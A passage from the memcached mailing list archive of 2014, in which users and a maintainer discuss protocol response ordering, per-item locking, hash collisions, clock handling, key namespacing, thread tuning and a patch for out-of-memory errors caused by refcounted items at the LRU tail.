with the ascii protocol, yes. It would not work otherwise. with the binary protocol, the answer is also currently yes, but the ordering isn't strict and could be up to the individual commands. On Wed, 22 Oct 2014, Yaowen Tu wrote: If I have a client that creates a TCP connection, and send multiple commands to the memcached server, will server guaranteed to respond to these commands in the same order? Thanks, Yaowen -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
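For illustration, this is roughly what that looks like on a single ascii-protocol connection: the two gets below are written back-to-back before reading anything, and the replies come back in the order the requests were sent (keys and values here are just examples).

    set a 0 0 1
    1
    STORED
    set b 0 0 1
    2
    STORED
    get a
    get b
    VALUE a 0 1
    1
    END
    VALUE b 0 1
    2
    END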
Re: Is memcached server response guaranteed to be in order?
I don't believe any binprot commands are out of order presently. However the protocol *allows* them to be out of order. it's probably a bug you're seeing in the client. also make sure your memcached daemon is up to date. On Thu, 23 Oct 2014, Yaowen Tu wrote: Thanks for your response. Could you please give me more information about individual commands? In which case it would be out of order? I am using xmemcached client and seeing some weird behavior with binary command, but text command works. I know there are some bugs in xmemcached client binary command code, I am trying to dig deeper to see if it is because of ordering of memcached responses. Based on your answer it is highly possible, so I would be really appreciated if you could share with me more detailed information. Thanks, Yaowen Yaowen On Thu, Oct 23, 2014 at 5:19 PM, dormando dorma...@rydia.net wrote: with the ascii protocol, yes. It would not work otherwise. with the binary protocol, the answer is also currently yes, but the ordering isn't strict and could be up to the individual commands. On Wed, 22 Oct 2014, Yaowen Tu wrote: If I have a client that creates a TCP connection, and send multiple commands to the memcached server, will server guaranteed to respond to these commands in the same order? Thanks, Yaowen -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Max number of concurrent updates for a same key at same time in memcache.
Internally, there's a per-item lock, so an item can only be updated by one thread at a time. This is *just* during the internal update, not while a client is uploading or downloading data to the key. You can probably do several thousand updates per second to the same key without problem (like incr'ing in a loop). Possibly a lot more (100k+) What're you trying to do which requires updating one key so much? On Tue, 21 Oct 2014, Shashank Sharma wrote: Hi all, Reading memcache documents its clear that it can handle a very heavy load of traffic. However I was more interested in knowing the bound on how may updates for a specific key at the same time can memcache handle. -Shashank -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
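As a small illustration of the "incr'ing in a loop" case over the ascii protocol (example key and values only): each incr is applied atomically under the item lock, so concurrent clients doing the same thing won't lose updates, they just serialize briefly on that one item.

    set counter 0 0 1
    0
    STORED
    incr counter 1
    1
    incr counter 1
    2
    incr counter 1
    3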
Re: Collision Resolution mechanism
The hash table buckets are chained. By default memcached autoresizes the hash table as the number of items grows, so bucket collision is relatively rare. In recent versions you can also switch the internal hash algorithm between jenkins and murmur if you want to test. On Sun, 19 Oct 2014, Deepak S wrote: Hi all, this is my first mail to this awesome group.What is the collision resolution mechanism used in memcached hash table? Thanks -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
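For anyone curious what "chained" means in practice, here is a simplified sketch of bucket chaining (illustrative names only, not the actual assoc.c code): colliding items are linked off the same bucket, and the full key is compared while walking the chain.

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    typedef struct item {
        struct item *h_next;   /* next item hashed into the same bucket */
        const char *key;
        const char *value;
    } item;

    /* Index the bucket with the hash, then walk the chain until the full key matches. */
    static item *bucket_find(item **table, uint32_t hashmask,
                             uint32_t hv, const char *key) {
        for (item *it = table[hv & hashmask]; it != NULL; it = it->h_next) {
            if (strcmp(it->key, key) == 0)
                return it;     /* exact match inside the collision chain */
        }
        return NULL;           /* chain exhausted: miss */
    }

    int main(void) {
        item b = { NULL, "bar", "2" };
        item a = { &b, "foo", "1" };              /* "foo" and "bar" pretend to collide */
        item *table[4] = { &a, NULL, NULL, NULL };
        item *hit = bucket_find(table, 3, 0 /* pretend hash */, "bar");
        printf("%s\n", hit ? hit->value : "miss");   /* prints 2 */
        return 0;
    }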
memcached 1.4.21
Is out: https://code.google.com/p/memcached/wiki/ReleaseNotes1421 - targeted release just for the OOM issues reported by Box + some misc fixes.
Re: items not able to be memcached and not logging
No idea, sorry :/ On Thu, 2 Oct 2014, Sheel Shah wrote: Understood. Do you know where I can find a supported windows version of the memcached exe? The most recent one I was able to find was version 1.4.4. Thanks, Sheel
Re: items not able to be memcached and not logging
Hey, Sorry but that version is well over 5 years old, and a forked windows port at that. It's unsupported. On Wed, 1 Oct 2014, Sheel Shah wrote: I believe the version number on our current memcached EXE is 1.2.6. The error I see in my independent log is the following: Item could not be cached with memcached: item name Type: System.Data.DataTable, In process Cache Duration: 02:00:00 I intentionally left the item name out of the reply, but the items are not all the same, and are of different types. Thanks, Sheel -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: items not able to be memcached and not logging
What version of memcached are you running (the server, not the client). What is the exact error you're seeing in the logs? On Tue, 30 Sep 2014, Sheel Shah wrote: Hello, I apologize for the vagueness of this post, as I am new to using and supporting memcached. For the last couple of months, we have seen a large number of errors where items could not be cached through Memcached. To troubleshoot the issue, we are attempting to enable logging that we found on this URL https://github.com/enyim/EnyimMemcached/wiki/Configure-Logging We attempted to enable the diagnostic logging as well as the Log4Net logging. And while we are seeing errors in another log file which shows that the items could not be memcached, we are unable to see anything in the diagnostic logs that could explain why the items are failing. I'm fairly certain it's not a permissions problem, as I allowed the app pool identity full access to the subfolder as well as the log file, and the read-only attribute on the file/folder is not checked. Has anyone else had a similar issue or can point me in the right direction? Thanks, Sheel Shah -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: change os'date Memcached stats time While being changed
Recent versions use a monotonic clock, so changing the system clock can't cause memcached to lose its mind. Why are you trying to do this on purpose? On Tue, 16 Sep 2014, Yu Liu wrote: Today I found that memcached could not work. Then I found that memcached's stats time changes when the OS date is changed. EXP-1: CentOS 6.5 64bit, Memcached version: 1.4.7 # date Tue Sep 16 09:56:43 CST 2014 # telnet 10.11.1.15 11211 Trying 10.11.1.15... Connected to 10.11.1.15 (10.11.1.15). Escape character is '^]'. stats STAT pid 2923 STAT uptime 9 STAT time 1410850931 STAT version 1.4.7 change date: # date Fri Jul 26 00:00:00 CST 2013 # telnet 10.11.1.15 11211 Trying 10.11.1.15... Connected to 10.11.1.15 (10.11.1.15). Escape character is '^]'. stats STAT pid 2923 STAT uptime 4258884380 STAT time 5669735302 STAT version 1.4.7 However, after upgrading memcached to 1.4.20: CentOS 6.5 64bit, Memcached version: 1.4.20 stats STAT pid 2586 STAT uptime 8 STAT time 1410838280 STAT version 1.4.20 STAT libevent 1.4.13-stable change date: stats STAT pid 2586 STAT uptime 55 STAT time 1410838327 STAT version 1.4.20 Now this time cannot be changed. What's the matter? I did not find the answer in http://code.google.com/p/memcached/wiki/ReleaseNotes.
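For reference, the difference boils down to which clock the server reads. Here is a minimal standalone sketch (not memcached's actual clock code; on older glibc, link with -lrt): CLOCK_MONOTONIC keeps counting steadily even when the wall clock is set backwards with date, which is why uptime and time stay sane in 1.4.20.

    #define _POSIX_C_SOURCE 199309L
    #include <stdio.h>
    #include <time.h>

    int main(void) {
        struct timespec mono, wall;
        clock_gettime(CLOCK_MONOTONIC, &mono);  /* unaffected by date(1) changes */
        clock_gettime(CLOCK_REALTIME, &wall);   /* jumps when the system date is changed */
        printf("monotonic: %lld s since an arbitrary (boot-time) origin\n", (long long)mono.tv_sec);
        printf("realtime:  %lld s since the epoch\n", (long long)wall.tv_sec);
        return 0;
    }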
Re: Remove certain items from the cache
Why would another client get the wrong data if the original data was successfully uploaded? I don't understand the use case, and it's not possible either way. On Wed, 3 Sep 2014, Xingui Shi wrote: What I meant is that the data is successfully uploaded, but the client restarts for some reason. The data stored in the memcached server needs to be flushed, or another client may get the wrong data. On Wednesday, September 3, 2014 at 3:04:59 PM UTC+8, Dormando wrote: If a client is uploading something and it does not complete the upload, the data will be dropped. Otherwise, no. On Wed, 3 Sep 2014, Xingui Shi wrote: Hi, Is there any way to drop data added by a client when the client aborts or exits normally? thanks. On Tuesday, August 12, 2014 at 10:25:43 AM UTC+8, Dormando wrote: Hello there, Is there a method to remove items from the cache using a regular expression on the key? For example, we want to remove all keys like my_key_*. We tried to parse all the slabs with the stats cachedump command, but our slabs contain several pages and it is impossible to recover all the elements! Thank you. Hi, The common way to do this, instantly, and atomically across your entire memcached cluster is via namespacing: http://code.google.com/p/memcached/wiki/NewProgrammingTricks#Namespacing You take a tradeoff: before I look up my key, I fetch a side key which contains the current prefix. Then I add that prefix to my normal key and do the lookup. When you want to invalidate all keys with the same prefix, you incr or otherwise update the prefix. The old keys will fall out of the LRU and your clients will no longer access them. This is *much* more efficient than any wrangling around with scanning and parsing keys. That only gets worse as you get a larger cluster, while namespacing stays at a consistent speed. Does this match what you're looking for, or did you have some specific requirements? If so, please give more detail for your problem.
Re: tail repair issue (1.4.20)
Thanks so much for sticking around and testing! I have a number of bugs to go over as I mentioned before, so it may take a little longer to bake this into a release. I still want to add a cap on how much churn it allows, so for 10,000 items you might instead get a handful of OOM's. This is to deal with extreme cases regardless. Again, thanks. It's been really hard to get people to stick around for this; first we had to fix the crash caused by items sitting in the LRU, then it became apparent why they were there and we could fix that issue. I'm happy to understand this. On Tue, 26 Aug 2014, Jay Grizzard wrote: Okay, so, we did some testing! I deployed a test build last Thursday and let it run with no further changes, graphing the ‘reflocked’ counter (which is the metric I added for ‘refcounted so moved to other end of LRU’). The graph for that ends up looking like this: http://i.imgur.com/0CZfHWf.png Basically a spike on restart (which makes sense, there’s probably a few fast-expiring or deleted entries on the tail almost immediately), and then occasional spikes over time. More spikes than I actually *expected*, but none are particularly large, and I’d completely believe that we had ‘legitimate’ locking of items in there, too. So I consider that completely helpful. (The graph is total across all slabs, and peaks at 8/sec, and only briefly, so… yeah, healthy.) The other thing I did yesterday was to intentionally lock a bunch of items to see what the behavior looked like. I picked a slab that was relatively high churn (max item age ~6000) and had no reflocks at all. Created 10k items and locked them. The reflocked graph for that looks like this: http://i.imgur.com/oghSU3o.png Basically, one big spike every couple of hours (with the interval decreasing as traffic increases). You can’t see it from the graph, but the reflocked counter increments by exactly 10,000 for each spike, while the outofmemory counter stays at zero. This is exactly what I expected to happen, which is awesome. We’ve otherwise been really stable with the patch, so I think I’m fairly comfortable saying the patch you provided is a reasonable solution to the problem. I’d even be satisfied without adding anything else to limit number of moves to 5 in a go, since the odds of that being an issue in just about any situation seem … low. But if you can add it cleanly, go for it! :) Let me know when you have a final patch (which would presumably be a release candidate for 1.4.21) and I’ll be happy to verify that as well, and then we can officially declare this bug dead and have a little party, since I totally think finally finding this thing is deserving of a party… ;) -j On Thu, Aug 21, 2014 at 12:33 PM, dormando dorma...@rydia.net wrote: Okay cool. As I mentioned with the original link I will be adding some sort of sanity checking to break the loop. I just have to reorganize the whole thing and ran out of time (I got stuck for a while because unlink was wiping search-prev and it kept bailing the loop :P) I need someone to try it to see if it's the right approach first, then the rest is doable. It's just tricky code and requires some care. Thanks for putting some effort into this. I really appreciate it! On Thu, 21 Aug 2014, Jay Grizzard wrote: Hi, sorry about the slow response. Naturally, the daily problem we were having stopped as soon as you checked in that patch. Typical, eh? 
Anyhow, I’ve studied the patch and it seems to be pretty good — the only worry I have is that if you end up with the extremely degenerate case of an entire LRU being refcounted, you have to walk the entire LRU before returning ‘out of memory’. I’m not thinking that this is a big problem (because if you have a few tens of thousands of items, that’s pretty quick… and if you have millions… well, why do you have millions of items refcounted?), but worth at least noting. I was going to suggest a change to make it fit into the ‘tries’ loop better so those moves got counted as a try, but there doesn’t seem to be a particularly clean way to do that, so I’m willing to just accept it as a limitation that might get hit in situations far worse than the one that’s causing us issues right now. I’m okay with that. I haven’t tried the patch under production load yet, because I wanted to have stats to give us some information about what was going on under the hood. I finally got a chance to add in an additional stat for refcounted items on the tail — I sent you a PR with that patch (https://github.com/dormando/memcached/pull/1). I *think* I got the right things in the right places, though you may take issue with the stat name (“reflocked”). Now that I have the stats, I’m going to work on putting
Re: tail repair issue (1.4.20)
Okay cool. As I mentioned with the original link I will be adding some sort of sanity checking to break the loop. I just have to reorganize the whole thing and ran out of time (I got stuck for a while because unlink was wiping search-prev and it kept bailing the loop :P) I need someone to try it to see if it's the right approach first, then the rest is doable. It's just tricky code and requires some care. Thanks for putting some effort into this. I really appreciate it! On Thu, 21 Aug 2014, Jay Grizzard wrote: Hi, sorry about the slow response. Naturally, the daily problem we were having stopped as soon as you checked in that patch. Typical, eh? Anyhow, I’ve studied the patch and it seems to be pretty good — the only worry I have is that if you end up with the extremely degenerate case of an entire LRU being refcounted, you have to walk the entire LRU before returning ‘out of memory’. I’m not thinking that this is a big problem (because if you have a few tens of thousands of items, that’s pretty quick… and if you have millions… well, why do you have millions of items refcounted?), but worth at least noting. I was going to suggest a change to make it fit into the ‘tries’ loop better so those moves got counted as a try, but there doesn’t seem to be a particularly clean way to do that, so I’m willing to just accept it as a limitation that might get hit in situations far worse than the one that’s causing us issues right now. I’m okay with that. I haven’t tried the patch under production load yet, because I wanted to have stats to give us some information about what was going on under the hood. I finally got a chance to add in an additional stat for refcounted items on the tail — I sent you a PR with that patch (https://github.com/dormando/memcached/pull/1). I *think* I got the right things in the right places, though you may take issue with the stat name (“reflocked”). Now that I have the stats, I’m going to work on putting a patched copy out under production load to make sure it holds up there, and at least see about artificially generating one of the hung-get situations that was causing us problems. I’ll let you know how that works out! -j On Mon, Aug 11, 2014 at 8:54 PM, dormando dorma...@rydia.net wrote: Well, sounds like whatever process was asking for that data is dead (and possibly pissing off a customer) so you should indeed figure out what that's about. Yeah, we’ll definitely hunt this one down. I’ll have to toss up a monitor to look for things in a write state for extended periods and then go do some tracing (rather than, say, waiting for it to actually break again). We *do* have some legitimately long-running (multi-hour) things going on, so can’t just say “long connection bad!”, but it would be nice if maybe those processes could slurp their entire response upfront or some such. I think another thing we can do is actually throw a refcounted-for-a-long-time item back to the front of the LRU. I'll try a patch for that this weekend. It should have no real overhead compared to other approaches of timing out connections. Is there any reason you can’t do “if refcount 1 when walking the end of the tail, send to the front” without requiring ‘refcounted for a long time’ (with, of course, still limiting it to 5ish actions)? It seems like this would be pretty safe, since generally stuff at the end of LRU shouldn’t have a refcount, and then you don’t need extra code for figuring out how long something has been refcounted. 
I guess there’s a slightly degenerate case in there, which is that if you have a small slab that’s 100% refcounted, you end up cycling a bunch of pointers every write just to run the LRU in a big circle and never write anything (similar to the case you suggest in your last paragraph), but that’s a situation I’m totally willing to accept. ;) Anyhow, looking forward to a patch, and will gladly help test! Here, try out this branch: https://github.com/dormando/memcached/tree/refchuck It needs some cleanup and sanity checking. I want to redo the loop instead of the weird goto, add an arg to item_update intead of copypasta, and add one or two sanity checks to break the loop if you're trying to alloc out of a class that's 100% reflocked. I added a test that works okay. Fails before, runs after. Can you try this on one or two machines and see what the impact is? If it works okay I'll clean it up and merge. Need to spend a little more time on the PR queue before I can cut though. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails
Re: tail repair issue (1.4.20)
Apparently I lied about the weekend, sorry... On Mon, 11 Aug 2014, Jay Grizzard wrote: Well, sounds like whatever process was asking for that data is dead (and possibly pissing off a customer) so you should indeed figure out what that's about. Yeah, we’ll definitely hunt this one down. I’ll have to toss up a monitor to look for things in a write state for extended periods and then go do some tracing (rather than, say, waiting for it to actually break again). We *do* have some legitimately long-running (multi-hour) things going on, so can’t just say “long connection bad!”, but it would be nice if maybe those processes could slurp their entire response upfront or some such. Good luck! I think another thing we can do is actually throw a refcounted-for-a-long-time item back to the front of the LRU. I'll try a patch for that this weekend. It should have no real overhead compared to other approaches of timing out connections. Is there any reason you can’t do “if refcount > 1 when walking the end of the tail, send to the front” without requiring ‘refcounted for a long time’ (with, of course, still limiting it to 5ish actions)? It seems like this would be pretty safe, since generally stuff at the end of LRU shouldn’t have a refcount, and then you don’t need extra code for figuring out how long something has been refcounted. I guess there’s a slightly degenerate case in there, which is that if you have a small slab that’s 100% refcounted, you end up cycling a bunch of pointers every write just to run the LRU in a big circle and never write anything (similar to the case you suggest in your last paragraph), but that’s a situation I’m totally willing to accept. ;) Anyhow, looking forward to a patch, and will gladly help test! Thanks! I'm going back and forth on it honestly. I think it should only move it if it's been at least UPDATE_INTERVAL since it last moved it, possibly UPDATE_INTERVAL * 4. Given your case of "I have a bajillion objects ref'ed by this one connection", and the fact that the allocator only walks five up in the history before giving up, I have two main options: 1) throw the bottom 5 to the top, then give up (and do that for each allocation forever, which can slow down all writes by holding the central cache lock for longer). That'll still cause a number of OOM's while it tries to clear your 9,000 ref'ed objects from the bottom (yeah I know it's only 3200ish) 2) If it's refcounted and its last_update is at least UPDATE_INTERVAL*N old, flip it to the top and don't count that as a try. This will cause memcached to have a very brief hiccup when it lands on the pile of objects, but won't cause an OOM and won't flip around forever. It also avoids a pathological regression if someone hammers a slab class stuck in this state (and path #1 was chosen). If you have teeny slab classes you're likely to be screwed either way, so the extra time interval doesn't hurt you much more than it would anyway. I assume/hope objects that you've been fetching take more than a couple minutes to hit the bottom of the slab class. If they do, your evictions are probably nutters and hit rate crap anyway; you'd need more ram. So yeah. leaning toward #2? A different definition of "refcounted for a long time" compared to what tail_repairs defaulted to. Much shorter.
Re: Remove certain items from the cache
Hello there, Is there a method to remove items from the cache using a regular expression on the key? For example, we want to remove all keys like my_key_*. We tried to parse all the slabs with the stats cachedump command, but our slabs contain several pages and it is impossible to recover all the elements! Thank you. Hi, The common way to do this, instantly, and atomically across your entire memcached cluster is via namespacing: http://code.google.com/p/memcached/wiki/NewProgrammingTricks#Namespacing You take a tradeoff: before I look up my key, I fetch a side key which contains the current prefix. Then I add that prefix to my normal key and do the lookup. When you want to invalidate all keys with the same prefix, you incr or otherwise update the prefix. The old keys will fall out of the LRU and your clients will no longer access them. This is *much* more efficient than any wrangling around with scanning and parsing keys. That only gets worse as you get a larger cluster, while namespacing stays at a consistent speed. Does this match what you're looking for, or did you have some specific requirements? If so, please give more detail for your problem.
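A rough sketch of what the namespacing trick looks like on the client side (the names and key layout here are illustrative, not from the wiki page; fetching the counter from the side key through your actual memcached client is left out):

    #include <stdint.h>
    #include <stdio.h>

    /* Build the real cache key from a namespace counter stored in a side key
       (e.g. "ns:products"). Bumping that counter with incr makes every key built
       under the old prefix unreachable; the stale items simply age out of the LRU. */
    static void build_key(char *out, size_t outlen,
                          uint64_t ns_counter, const char *logical_key) {
        snprintf(out, outlen, "%llu:%s",
                 (unsigned long long)ns_counter, logical_key);
    }

    int main(void) {
        char key[250];   /* memcached keys are limited to 250 bytes */
        build_key(key, sizeof(key), 41, "my_key_1");
        printf("before invalidation: %s\n", key);      /* 41:my_key_1 */
        build_key(key, sizeof(key), 42, "my_key_1");   /* after incr'ing the side key */
        printf("after invalidation:  %s\n", key);      /* 42:my_key_1 */
        return 0;
    }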
Re: tail repair issue (1.4.20)
Well, sounds like whatever process was asking for that data is dead (and possibly pissing off a customer) so you should indeed figure out what that's about. Yeah, we’ll definitely hunt this one down. I’ll have to toss up a monitor to look for things in a write state for extended periods and then go do some tracing (rather than, say, waiting for it to actually break again). We *do* have some legitimately long-running (multi-hour) things going on, so can’t just say “long connection bad!”, but it would be nice if maybe those processes could slurp their entire response upfront or some such. I think another thing we can do is actually throw a refcounted-for-a-long-time item back to the front of the LRU. I'll try a patch for that this weekend. It should have no real overhead compared to other approaches of timing out connections. Is there any reason you can’t do “if refcount 1 when walking the end of the tail, send to the front” without requiring ‘refcounted for a long time’ (with, of course, still limiting it to 5ish actions)? It seems like this would be pretty safe, since generally stuff at the end of LRU shouldn’t have a refcount, and then you don’t need extra code for figuring out how long something has been refcounted. I guess there’s a slightly degenerate case in there, which is that if you have a small slab that’s 100% refcounted, you end up cycling a bunch of pointers every write just to run the LRU in a big circle and never write anything (similar to the case you suggest in your last paragraph), but that’s a situation I’m totally willing to accept. ;) Anyhow, looking forward to a patch, and will gladly help test! Here, try out this branch: https://github.com/dormando/memcached/tree/refchuck It needs some cleanup and sanity checking. I want to redo the loop instead of the weird goto, add an arg to item_update intead of copypasta, and add one or two sanity checks to break the loop if you're trying to alloc out of a class that's 100% reflocked. I added a test that works okay. Fails before, runs after. Can you try this on one or two machines and see what the impact is? If it works okay I'll clean it up and merge. Need to spend a little more time on the PR queue before I can cut though. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: tail repair issue (1.4.20)
Thanks! It might take me a while to look into it more closely. That conn_mwrite is probably bad, however a single connection shouldn't be able to do it. Before the OOM is given up, memcached walks up the chain from the bottom of the LRU by 5ish. So all of them have to be locked, or possibly some thing I'm unaware of. Great that you have some cores. Can you look at the tail of the LRU for the slab which was OOM'ing, and print the item struct there? If possible, walk up 5-10 items back from the tail and print each (anonymized, of course). It'd be useful to see the refcount and flags on the items. Have you tried re-enabling tailrepairs on one of your .20 instances? It could still crash sometimes, but you can set the timeout to a reasonably low number and see if that helps at all while we figure this out. On Thu, 7 Aug 2014, Jay Grizzard wrote: (I work with Denis, who is out of town this week) So we finally got a more proper 1.4.20 deployment going, and we’ve seen this issue quite a lot over the past week. When it happened this morning I was able to grab what you requested. I’ve included a couple of “stats conn” dumps, with anonymized addresses, taken four minutes apart. It looks like there’s one connection that could possibly be hung: STAT 2089:state conn_mwrite …would that be enough to cause this problem? (I’m assuming the answer is “it depends”) I snagged a core file from the process that I should be able to muck through to answer questions if there’s somewhere in there we would find useful information. Worth noting that while we’ve been able to reproduce the hang (a single slab starts reporting oom for every write), we haven’t reproduced the “but recovers on its own” part because these are production servers and the problem actually causes real issues, so we restart them rather than waiting several hours to see if the problem clears up. Also, reading up in the thread, it’s worth noting that lack of TCP keepalives (which we actually have, memcached enables it) wouldn’t actually affect the “and automatically recover” aspect of things, because TCP keepalives only happen when a connection is completely idle. When there’s pending data (which there would be on a hung write), standard TCP timeouts (which are much faster) apply. (And yes, we do have lots of idle connections to our caches, but that’s not something we can immediately fix, nor should it directly be the cause of these issues.) Anyhow… thoughts? -j -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
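For anyone wanting to do the same inspection from a core file: assuming a build with debug symbols, the static per-class LRU tail pointers (tails[] in items.c) can be walked roughly like this, where 12 is just an example slab class id; the interesting fields on each printed item are refcount and it_flags.

    (gdb) p *tails[12]
    (gdb) p *tails[12]->prev
    (gdb) p *tails[12]->prev->prev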
Re: Memcached instance and thread configuration parameters
Please upgrade. If you have problems with the latest version we can look into it more. You can also look at command counters for odd commands being given: make sure nobody's running flushes, or stats sizes, or stats cachedump since those can cause CPU spikes and hangs. With 1.4.20 you can use stats conns to see what the connections are doing during the cpu spike. On Thu, 7 Aug 2014, Claudio Santana wrote: Forgot to say I'm running version 1.4.13 libevent 2.0.16-stable On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana claudio.sant...@gmail.com wrote: Sorry for the late response. My CPU utilization normally is min 2.5% to 6.5% max. So it's interesting you ask this. The reason why I submitted the 1st question is because I've experienced some random CPU utilization spikes. From this about 6% CPU utilization all of the sudden it spikes to 100% and I can see the offending process is one of the Memcached instances. Sadly this CPU spike is accompanied by all requests timing out causing the whole system to become unusable. I collect minute by minute stats of all these memcached instances and according to my stats this issue happens within 2 minutes. I can see in the number of commands there's no increase in number of commands being issued right before the CPU spike nor increase in the number of bytes in/out. Does anybody have any ideas of what could be going on? I have all Memcached stats collected by minute in Graphite, I can provide other stats that could help explain this issue if necessary. On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net wrote: You could run one instance with one thread and serve all of that just fine. have you actually looked at graphs of the CPU usage of the host? memcached should be practically idle with load that low. One with -t 6 or -t 8 would do it just fine. On Mon, 4 Aug 2014, Claudio Santana wrote: Dormando, thanks for the quick response. Sorry for the confusion, I don't have exact metrics per second but per minute 1.12 million sets and 1.8 million gets which translates to 18,666 sets per minute and 30,000 gets per second. These stats are per Memcached instance which I currently run 3 on each server. Claudio. On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net wrote: On Mon, 4 Aug 2014, Claudio Santana wrote: I have this Memcached cluster where 3 instances of Memcached run in a single server. These servers have 24 cores, each instance is configured to have 8 threads each. Each individual instance serves have about 5000G gets/sets a day and about 3k current connections. I don't know what 5000G gets/sets a day translates to in per-second (nor what the G-unit even is?), can you define this? What would be better? consolidate these 3 instances to a single instance per server with 24 threads? I've read in a few articles that Memcached's performance starts suffering with more than 4-6 threads per instance, is this generally true? How about keeping the 3 instances per server and decreasing the number of threads to say 4 or 6? or creating 4 instances in the same servers instead of 3 and decreasing the number of threads per instance to 6 so there is one thread per core. Is there a guide you could recommend to configure the right number of threads and strategies to get the most out of a Memcached server/instance? Thanks, Claudio -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. 
Re: Memcached instance and thread configuration parameters
Those three stats commands aren't problematic. The others I listed are. Sadly there aren't stats counters for them, I think... Are you sure it's not completely crashing after the CPU spike? it actually recovers on its own? On Thu, 7 Aug 2014, Claudio Santana wrote: I run every minute stats, stats items and stats slabs. the only commands executed are remove, incr, add, get, set and cas. I'm running now with 6 threads per instance with 3 per server and haven't had the issue again, not that this change fixed it. I'll definitely update. On Aug 7, 2014 6:13 PM, dormando dorma...@rydia.net wrote: Please upgrade. If you have problems with the latest version we can look into it more. You can also look at command counters for odd commands being given: make sure nobody's running flushes, or stats sizes, or stats cachedump since those can cause CPU spikes and hangs. With 1.4.20 you can use stats conns to see what the connections are doing during the cpu spike. On Thu, 7 Aug 2014, Claudio Santana wrote: Forgot to say I'm running version 1.4.13 libevent 2.0.16-stable On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana claudio.sant...@gmail.com wrote: Sorry for the late response. My CPU utilization normally is min 2.5% to 6.5% max. So it's interesting you ask this. The reason why I submitted the 1st question is because I've experienced some random CPU utilization spikes. From this about 6% CPU utilization all of the sudden it spikes to 100% and I can see the offending process is one of the Memcached instances. Sadly this CPU spike is accompanied by all requests timing out causing the whole system to become unusable. I collect minute by minute stats of all these memcached instances and according to my stats this issue happens within 2 minutes. I can see in the number of commands there's no increase in number of commands being issued right before the CPU spike nor increase in the number of bytes in/out. Does anybody have any ideas of what could be going on? I have all Memcached stats collected by minute in Graphite, I can provide other stats that could help explain this issue if necessary. On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net wrote: You could run one instance with one thread and serve all of that just fine. have you actually looked at graphs of the CPU usage of the host? memcached should be practically idle with load that low. One with -t 6 or -t 8 would do it just fine. On Mon, 4 Aug 2014, Claudio Santana wrote: Dormando, thanks for the quick response. Sorry for the confusion, I don't have exact metrics per second but per minute 1.12 million sets and 1.8 million gets which translates to 18,666 sets per minute and 30,000 gets per second. These stats are per Memcached instance which I currently run 3 on each server. Claudio. On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net wrote: On Mon, 4 Aug 2014, Claudio Santana wrote: I have this Memcached cluster where 3 instances of Memcached run in a single server. These servers have 24 cores, each instance is configured to have 8 threads each. Each individual instance serves have about 5000G gets/sets a day and about 3k current connections. I don't know what 5000G gets/sets a day translates to in per-second (nor what the G-unit even is?), can you define this? What would be better? consolidate these 3 instances to a single instance per server with 24 threads? I've read in a few articles that Memcached's performance starts suffering with more than 4-6 threads per instance, is this generally true? 
